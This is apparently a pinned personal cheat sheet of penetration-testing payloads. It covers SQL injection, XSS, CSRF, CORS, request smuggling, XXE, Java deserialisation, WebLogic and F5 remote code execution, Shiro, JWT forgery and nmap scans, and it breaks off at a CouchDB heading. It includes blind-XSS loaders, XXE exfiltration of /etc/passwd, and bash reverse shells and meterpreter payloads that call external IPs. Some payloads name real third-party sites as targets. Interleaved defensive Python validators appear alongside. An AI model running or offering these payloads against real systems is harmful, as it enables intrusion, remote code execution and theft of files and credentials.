【Pinned】Penetration Testing Payload Notes

SQLi

Fuzzy (LIKE) query context:

```
%' and '%'='%
```

Same, without spaces:

```
%'and'%'='%
```

Time-based blind, one string that works in a bare, single-quoted or double-quoted context:

```
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
```

In a GET parameter (URL-encoded):

```
if(now()%3Dsysdate()%2Csleep(10)%2C0)%2f*'XOR(if(now()%3Dsysdate()%2Csleep(10)%2C0))OR'"XOR(if(now()%3Dsysdate()%2Csleep(10)%2C0))OR"*%2f%0A
```

In a JSON body:

```
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'%22XOR(if(now()=sysdate(),sleep(10),0))OR%22*/
```

Error-based:

```
'%20AND%20(SELECT%203607%20FROM(SELECT%20COUNT(*),CONCAT(0x716b716271,(SELECT%20(ELT(3607=3607,1))),0x7171766271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'ycfF'='ycfF
```

XSS

Bypassing on* event-handler filters:

```html
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
```

XSS cheat sheet: https://zhuanlan.zhihu.com/p/98177600

List of event handlers: https://www.cnblogs.com/hookjoy/p/4109682.html

Probe && blind XSS:

```html
</tExtArEa>'"><sCrIpt src=https://xs.laker.top/s></ScRiPt>
'"><sCrIpt src=https://xs.laker.top/s></ScRiPt>

data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMTExKT4=
</tExtArEa>'"><sCRiPt>alert(1)</sCrIpT>
%3c/tExtArEa%3e'"%3e%3cscript src="https://1e3.laker.top/myjs/1.js"%3e%3c/script%3e
```

DOM-XSS keywords (Burp search):

```
(?:location\.href)|(?:location\.search)|(?:location\.hash)|(?:location\.pathname)    # source keywords (input side)

(?:document\.write\()|(?:innerHtml\()|(?:eval\()|(?:\.html\()|(?:\.append\() # sink keywords (output side)
```

Most commonly used:

```
(?:document\.write\()|(?:innerHtml\()|(?:eval\()
```

CSRF

No Referer (auto-submitted form):

```html
<html>
<body>
<form action="https://tjzb.newhealth.com.cn/personal/home" method="POST">
<input type="hidden" name="desktopIndex" value="https://baidu.com" />
<input type="hidden" name="mobileIndex" value="https://baidu.com" />
<input type="submit" value="CSRF bypass" />
</form>
</body>
</html>
```

GET type:

```html
<img src="http://***">
```

JSONP

```html
<script>
function useUserInfo(v){
alert(v.username);
}
</script>
<script src="http://www.test.com/userinfo?callback=useUserInfo"></script>
```

WebSocket

```http
GET ws://echo.websocket.org/?encoding=text HTTP/1.1
Host: echo.websocket.org
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Origin: http://www.malicious.website.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6
Cookie: _gat=1; _ga=GA1.2.290430972.14547651; JSESSIONID=1A9431CF043F851E0356F5837845B2EC
Sec-WebSocket-Key: 7ARps0AjsHN8bx5dCI1KKQ==
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
```

PS: Cross-origin resource sharing (CORS) does not apply to WebSocket; the WebSocket protocol does not specify any cross-origin handling.

CORS

GET:

```html
<script type="text/javascript">
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.onreadystatechange = function() {
if(xhr.readyState === 4) {
alert(xhr.responseText);
}
}
xhr.open("GET", "https://***");
xhr.send();
</script>
```

POST:

```html
<script src="http://www.jq22.com/jquery/jquery-3.3.1.js"></script>
<script type="text/javascript">
$.post(
{
type: "post",
url: "https://***",
contentType: "application/json; charset=utf-8",
xhrFields: {
withCredentials: true
},
crossDomain: true,
data: JSON.stringify(
{"protocol":{"fromPlatform":"venus_jquery_fnc_biz_web","functionCode":"order_list"},"param":{"filter":{"orderType":"all","lastMonths":0,"queryStartDate":"","queryEndDate":""},"page":1,"size":8}}
),
success: function(data){
alert("hijack: " + JSON.stringify(data));
},
}
);
</script>
```

Alternatively, a PoC using SWF_JSON_CSRF:

```html
<embed src="http://www.0xby.com/swf_json_csrf/test.swf?endpoint=http://baidu.com/aaa/bb/test.do&reqmethod=POST&ct=application/json;charset=UTF-8&jsonData={'k1':'v1','k2':'v2'}&php_url=http://www.0xby.com/swf_json_csrf/test.php" type="application/x-shockwave-flash"/>
```

CORS (Access-Control-Allow-Origin: *) bypass

https://hackerone.com/reports/761726

```html
<html>
<script>
var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";
fetch(url, {
method: 'GET',
cache: 'force-cache'
});
</script>
</html>
```
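The CSRF, WebSocket and CORS sections above all come down to one server-side question: does the request's stated origin belong to the application? The following is an added example, not part of the original note, showing the three gates a defender would put in front of these endpoints: a CSRF check that refuses a state-changing request when neither Origin nor Referer is present (the exact case the no-Referer form PoC relies on), a WebSocket upgrade handler that validates Origin itself because CORS never applies to the handshake, and a CORS response policy that never pairs credentials with a wildcard. The allow-list and the handshake dictionary are constructed; the handshake is modelled on the request shown in the WebSocket section.

```python
import base64
import hashlib
from urllib.parse import urlsplit

# Constructed allow-list of first-party origins; anything else, including "null", is refused.
ALLOWED_ORIGINS = {"https://app.example.test"}
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"   # fixed by RFC 6455


def origin_of(url: str):
    """scheme://host[:port] of a URL, lower-cased; None when the URL carries no host."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower() if p.scheme and p.netloc else None


def csrf_check(method: str, headers: dict):
    """Gate for state-changing requests (headers keyed lower-case). Returns (allowed, reason).
    Origin wins when present; Referer is the fallback; a request carrying neither is refused."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    origin = headers.get("origin")
    if origin is not None:
        ok = origin.lower() in ALLOWED_ORIGINS
        return ok, ("origin allowed" if ok else f"origin {origin} refused")
    referer = headers.get("referer")
    if referer is not None:
        ok = origin_of(referer) in ALLOWED_ORIGINS
        return ok, ("referer allowed" if ok else f"referer {referer} refused")
    return False, "no Origin and no Referer"


def ws_handshake(headers: dict):
    """WebSocket upgrade gate. CORS does not cover the handshake, so the Origin header is the
    only thing between a hostile page and a cookie-authenticated socket. Returns (status, headers)."""
    if headers.get("upgrade", "").lower() != "websocket" or headers.get("sec-websocket-version") != "13":
        return 400, {}
    origin = headers.get("origin")
    if origin is None or origin.lower() not in ALLOWED_ORIGINS:
        return 403, {}
    key = headers.get("sec-websocket-key", "")
    accept = base64.b64encode(hashlib.sha1((key + WS_GUID).encode()).digest()).decode()
    return 101, {"Upgrade": "websocket", "Connection": "Upgrade", "Sec-WebSocket-Accept": accept}


def cors_headers(request_origin):
    """CORS response policy: credentials only for an allow-listed origin, echoed exactly, never with '*'."""
    if request_origin is not None and request_origin.lower() in ALLOWED_ORIGINS:
        return {
            "Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin",
        }
    return {}


# Constructed handshake modelled on the WebSocket request above, hostile Origin included.
HOSTILE_WS = {
    "upgrade": "websocket",
    "connection": "Upgrade",
    "sec-websocket-version": "13",
    "origin": "http://www.malicious.website.com",
    "sec-websocket-key": "7ARps0AjsHN8bx5dCI1KKQ==",
}

if __name__ == "__main__":
    print(csrf_check("POST", {}))
    print(ws_handshake(HOSTILE_WS))
    print(cors_headers("https://evil.example"))
```

The accept-key computation is the RFC 6455 one, so the handshake handler is a drop-in check rather than a sketch; a token-based CSRF defence still belongs alongside the header checks, since Referer can be stripped by privacy settings and the header gate then falls back to refusing the request.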

Clickjacking

```html
<html>
<head>
<title>Clickjacking</title>
</head>
<body>
<iframe src="http://***" width="1200" height="600"></iframe>
</body>
</html>
```

HTTP request smuggling

Change the path and Host of the POST request to point at the target:

```http
POST / HTTP/1.1
Host: laker.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4181.9 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G
```
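The request above carries both Content-Length: 6 and Transfer-Encoding: chunked, and the whole technique rests on two parsers reading the body boundary differently. The following is an added example, not from the original note: it parses a constructed copy of that request (headers trimmed), shows what a Content-Length-trusting parser and a chunked-trusting parser each consume, and implements the front-end policy that removes the ambiguity by rejecting any request whose framing two parsers could disagree on. The two sample requests are constructed.

```python
def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request_line, headers, body).
    Header values are kept as lists so duplicates stay visible to the policy check."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0].decode("latin-1"), headers, body


def body_by_content_length(headers, body: bytes):
    """What a Content-Length-trusting parser takes as the body, and what it leaves on the socket."""
    n = int(headers["content-length"][0])
    return body[:n], body[n:]


def body_by_chunked(body: bytes):
    """What a Transfer-Encoding-trusting parser consumes, and what it leaves as the start of the next request."""
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # chunk-size, chunk extensions ignored
        pos = end + 2
        if size == 0:
            break
        pos += size + 2                                  # chunk data plus its trailing CRLF
    while True:                                          # optional trailer lines, then the empty line
        end = body.index(b"\r\n", pos)
        line = body[pos:end]
        pos = end + 2
        if line == b"":
            break
    return body[:pos], body[pos:]


def smuggling_risk(raw: bytes):
    """Front-end policy: a rejection reason for any framing two parsers could read differently, else None.
    RFC 7230 section 3.3.3 says Transfer-Encoding overrides Content-Length, but a strict front end
    simply refuses the combination instead of hoping the back end agrees."""
    _, headers, _ = parse_request(raw)
    cl = headers.get("content-length", [])
    te = headers.get("transfer-encoding", [])
    if cl and te:
        return "Content-Length and Transfer-Encoding both present"
    if len(cl) > 1:
        return "duplicate Content-Length"
    if te and [v.lower() for v in te] != ["chunked"]:
        return "Transfer-Encoding is not exactly 'chunked'"
    return None


# Constructed copy of the request above: CL says the body is 6 bytes, TE says it ends at the 0 chunk.
SMUGGLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: laker.top\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 6\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\nG"
)
CLEAN_REQUEST = b"POST / HTTP/1.1\r\nHost: laker.top\r\nContent-Length: 3\r\n\r\na=1"

if __name__ == "__main__":
    _, hdrs, body = parse_request(SMUGGLE_REQUEST)
    print("CL view:", body_by_content_length(hdrs, body))
    print("TE view:", body_by_chunked(body))
    print("policy :", smuggling_risk(SMUGGLE_REQUEST))
```

Running it shows the disagreement directly: the Content-Length parser swallows all six bytes, the chunked parser stops after `0\r\n\r\n` and leaves the stray `G` as the first byte of whatever request follows on the same connection.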

SSI

```
<!-- exec cmd="whoami"-->
```

ESI

```
<esi:include src="http://s5beqn.ceye.io" />
```

LDAP injection

```
admin)(&))
```

Front-end probe (polyglot):

```
`';<!--"<XSS>=<!--esi-->{{7*7}}{%7*7%}&{()}
```

XXE

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://120.79.91.29/evil.dtd">
%remote;%all;
]>
<foo>
<code>&send;</code>
<msg>mypass</msg>
</foo>
```

Malicious DTD:

```xml
<!ENTITY % all "<!ENTITY send SYSTEM 'http://120.79.91.29:9999?q=%file;'>">
```

OOB data exfiltration:

```xml
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip:port?p=%file;'>">
```

PS: note the header Content-Type: application/xml.
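Both variants above depend on the parser honouring a DOCTYPE: the internal subset declares the parameter entities, and `%remote;` pulls the second-stage DTD from the attacker's host. The following is an added example, not from the original note, of the corresponding server-side guard in Python's standard library: an expat pre-pass that aborts at the first DOCTYPE or external-entity reference, in front of the normal ElementTree parse. The sample document is constructed after the payload above, with the DTD host replaced by a placeholder.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """Raised when a document carries a DOCTYPE or references an external entity."""


def _refuse_doctype(name, sysid, pubid, has_internal_subset):
    # Fires at "<!DOCTYPE ...", before any entity in the internal subset is declared or expanded.
    raise DoctypeRejected(f"DOCTYPE {name!r} refused")


def _refuse_external(context, base, sysid, pubid):
    # Belt and braces: expat asks this handler before resolving an external entity.
    raise DoctypeRejected(f"external entity {sysid!r} refused")


def reject_doctype(xml_bytes: bytes) -> None:
    """Pre-pass: parse with expat and abort on DOCTYPE or external-entity use.
    Both the inline-entity form and the remote-DTD (%remote;) form above trip the first handler."""
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _refuse_doctype
    parser.ExternalEntityRefHandler = _refuse_external
    parser.Parse(xml_bytes, True)


def safe_parse(xml_bytes: bytes):
    """Return (root_element, None) for an accepted document or (None, reason) for a refused one."""
    try:
        reject_doctype(xml_bytes)
    except DoctypeRejected as exc:
        return None, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return None, f"not well-formed: {exc}"
    return ET.fromstring(xml_bytes), None


# Constructed sample modelled on the XXE payload above; attacker.invalid is a placeholder host.
XXE_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://attacker.invalid/evil.dtd">
%remote;%all;
]>
<foo><code>&send;</code><msg>mypass</msg></foo>"""

# Same message without a DOCTYPE: this is what the endpoint should actually accept.
CLEAN_SAMPLE = b'<?xml version="1.0" encoding="UTF-8"?><foo><msg>mypass</msg></foo>'

if __name__ == "__main__":
    print(safe_parse(XXE_SAMPLE))
    root, _ = safe_parse(CLEAN_SAMPLE)
    print(root.find("msg").text)
```

Refusing every DOCTYPE is deliberately blunt: it also stops inline entity-expansion bombs, and an API endpoint that takes application/xml from clients has no legitimate reason to accept one.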

FastJson <= 1.2.48

```json
{
"name": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"x": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://120.79.91.29:9999/Exploit",
"autoCommit": true
}
}
```

PS: note the header Content-Type: application/json.

Weblogic

Endpoint to visit:

http://wscpay.sptcc.com/_async/AsyncResponseService

```http
POST /_async/AsyncResponseService HTTP/1.1
Host: 220.248.104.180
Content-Length: 760
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/soap+xml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping 120.79.91.29</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
```

```
CVE-2017-10271
http://192.168.8.148:7001/wls-wsat/CoordinatorPortType11


CVE-2018-2628
Checks the WebLogic version and whether the T3 protocol is enabled; only meaningful against unpatched instances.
nmap -n -v -p7001,7002 IP --script=weblogic-t3-info

CVE-2020-14882
http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27ping%20119.23.31.7%27);%22);
```

Reverse-shell one-liners

```shell
# Encoder site
# http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/119.23.31.7/8998 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjMuMzEuNy84OTk4IDA+JjE=}|{base64,-d}|{bash,-i}
```

metasploit

```shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=119.23.31.7 LPORT=4567 -f elf > shell.elf
mv shell.elf /var/www/html/shell.elf


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
msf exploit(handler) > set LPORT 4567
msf exploit(handler) > exploit -j
```

Jackson

```json
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://127.0.0.1:8005/~/test"}]
```

or

```json
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://120.79.91.29:9999/inject.sql'"}]
```

CVE-2020-8840

```json
["org.apache.xbean.propertyeditor.JndiConverter",   {"asText":"ldap://120.79.91.29:9999/ExportObject"}  ]
```

PS: note the header Content-Type: application/json.

Spring Boot Actuator

```
/jolokia/list
/env
/jolokia/read<svg%20onload=alert(document.cookie)>?mimeType=text/html
```

```json
{
"type": "EXEC",
"mbean": "Users:database=UserDatabase,type=UserDatabase",
"operation": "createRole",
"arguments": ["manager-gui", ""]
}
```

Spring SpEL injection

```
${7*7}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100)))}
```

Phpstudy backdoor

```http
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs=(whoami)
```

Weaver (泛微) OA SQL injection
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%
0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

Response marker: ADDRESS=(PROTOCAL=TCP)

ASPX write

```
aaaa
<%@ Page Language="Jscript" Debug=true%>
<%Response.Write("webshell");%>
```

Apache Shiro fingerprint

```
Cookie: rememberMe=1
```

xmlrpc

```xml
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value>
</param>
<param><value>password</value>
</param>
</params>
</methodCall>


Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://127.0.0.1:1133</string>
</value>
</param>
<param>
<value>
<string>ladybird</string>
</value>
</param>
</params>
</methodCall>
```

Apache Shiro below 1.4.2

```shell
java -jar ysoserial.jar CommonsBeanutils1 "ping 120.79.91.29" > payload.ser

java -jar ysoserial.jar URLDNS "http://s5beqn.ceye.io" > payload.ser
```

Run java -jar PaddingOracleAttack.jar targetUrl rememberMeCookie blockSize payloadFilePath, for example:
rememberMeCookie is a key present in the Cookie after a successful login; we need its value.
E.g. set rememberMe=true in the request; the response then carries Set-Cookie: rememberMe=***, and that *** is the rememberMe cookie.

```shell
java -jar PaddingOracleAttack-1.0-SNAPSHOT.jar "https://www.tatmasglobal.net/admin/code/sms-provider/login" <rememberMeCookie> 16 payload.bin
```

Nmap: common unauthenticated-access ports

```shell
nmap -p 8009 -iL 新建文本文档.txt -T4 -sS -Pn -sV > nmap_result.txt

nmap -p 27017,6379,11211,8080,5900,5901,2375,2181,837,9000 -iL 新建文本文档.txt -T4 -sS -Pn -sV > nmap_result.txt
```

9000 PHP-FPM

Nmap: weak-password services

```shell
nmap -p 21,22,23,25,69,110,139,143,161,389,445,512,513,514,873,1433,1521,2049,2181,3306,3389,3690,4440,5000,5432,5900,6379,8069,9200 -iL 新建文本文档.txt -T4 -sS -Pn -sV > nmap_result.txt
```

JWT attacks

```
eyJ***.eyJ***.hash   header.payload.signature
https://jwt.io/#encoded-jwt
Unverified-signature attack (given a JWT)
base64-decode the JWT, change the ordinary user to admin, re-encode
Disabling the hash
set the header alg to none; if the server accepts it, privilege escalation without the key
Weak key
https://github.com/lmammino/jwt-cracker
```
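The three items above (unverified signature, alg set to none, weak key) are each a verifier mistake, so the useful counterpart is a verifier that makes none of them. The following is an added example, not from the original note: a standard-library HS256 verifier that pins the algorithm itself instead of trusting the token's alg field, refuses an empty or mismatching signature before reading the payload, and applies the RFC 7518 minimum key size for HS256. The secret and the tokens are constructed; the minting helper exists only to build them.

```python
import base64
import hashlib
import hmac
import json

# RFC 7518 section 3.2: an HS256 key must be at least the hash output size, 256 bits.
MIN_HS256_SECRET_BYTES = 32


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def secret_is_strong(secret: bytes) -> bool:
    """Weak-key check: secrets below the RFC minimum are the ones offline cracking recovers."""
    return len(secret) >= MIN_HS256_SECRET_BYTES


def mint_hs256(payload: dict, secret: bytes) -> str:
    """Issue an HS256 token; used here only to build test material."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes):
    """Return (payload, None) on success or (None, reason) on failure.
    The algorithm is pinned by the verifier: the token's alg field may confirm HS256 but can never
    select 'none' or anything else, and the signature is checked before the payload is decoded."""
    parts = token.split(".")
    if len(parts) != 3:
        return None, "malformed: expected header.payload.signature"
    h, b, s = parts
    try:
        header = json.loads(b64url_decode(h))
    except (ValueError, UnicodeDecodeError):
        return None, "malformed header"
    alg = header.get("alg")
    if alg != "HS256":
        return None, f"alg {alg!r} not allowed"
    if not s:
        return None, "empty signature"
    try:
        given = b64url_decode(s)
    except ValueError:
        return None, "malformed signature"
    expected = hmac.new(secret, f"{h}.{b}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given):   # constant-time comparison
        return None, "signature mismatch"
    try:
        return json.loads(b64url_decode(b)), None
    except (ValueError, UnicodeDecodeError):
        return None, "malformed payload"


# Constructed material: a demo secret and the token shapes the note describes.
DEMO_SECRET = b"constructed-demo-secret-0123456789abcdef"          # 40 bytes, passes the size check
GOOD_TOKEN = mint_hs256({"sub": "alice", "role": "user"}, DEMO_SECRET)
_h, _b, _s = GOOD_TOKEN.split(".")
ADMIN_BODY = b64url_encode(b'{"sub":"alice","role":"admin"}')
TAMPERED_TOKEN = f"{_h}.{ADMIN_BODY}.{_s}"                           # payload edited, old signature kept
ALG_NONE_TOKEN = b64url_encode(b'{"alg":"none","typ":"JWT"}') + "." + ADMIN_BODY + "."

if __name__ == "__main__":
    for name, tok in [("good", GOOD_TOKEN), ("tampered", TAMPERED_TOKEN), ("alg=none", ALG_NONE_TOKEN)]:
        print(name, verify_hs256(tok, DEMO_SECRET))
    print("secret strong:", secret_is_strong(DEMO_SECRET))
```

The same pinning applies to asymmetric deployments: a verifier configured for RS256 must reject HS256 tokens outright, otherwise the public key becomes a usable HMAC secret.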

F5 BIG-IP (443, fofa: app="F5-BIGIP")

```
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/1.txt&content=id

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/1.txt

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list

Read:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/1.txt
```

Dubbo (port 12345)

```python
from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

client = DubboClient('127.0.0.1', 12345)

JdbcRowSetImpl=new_object(
'com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://120.79.91.29:9999/Exploit",
strMatchColumns=["foo"]
)
JdbcRowSetImplClass=new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean=new_object(
'com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl
)

resp = client.send_request_and_return_response(
service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
method_name='rce',
args=[toStringBean])
```

CouchDB (port 5984)

```shell
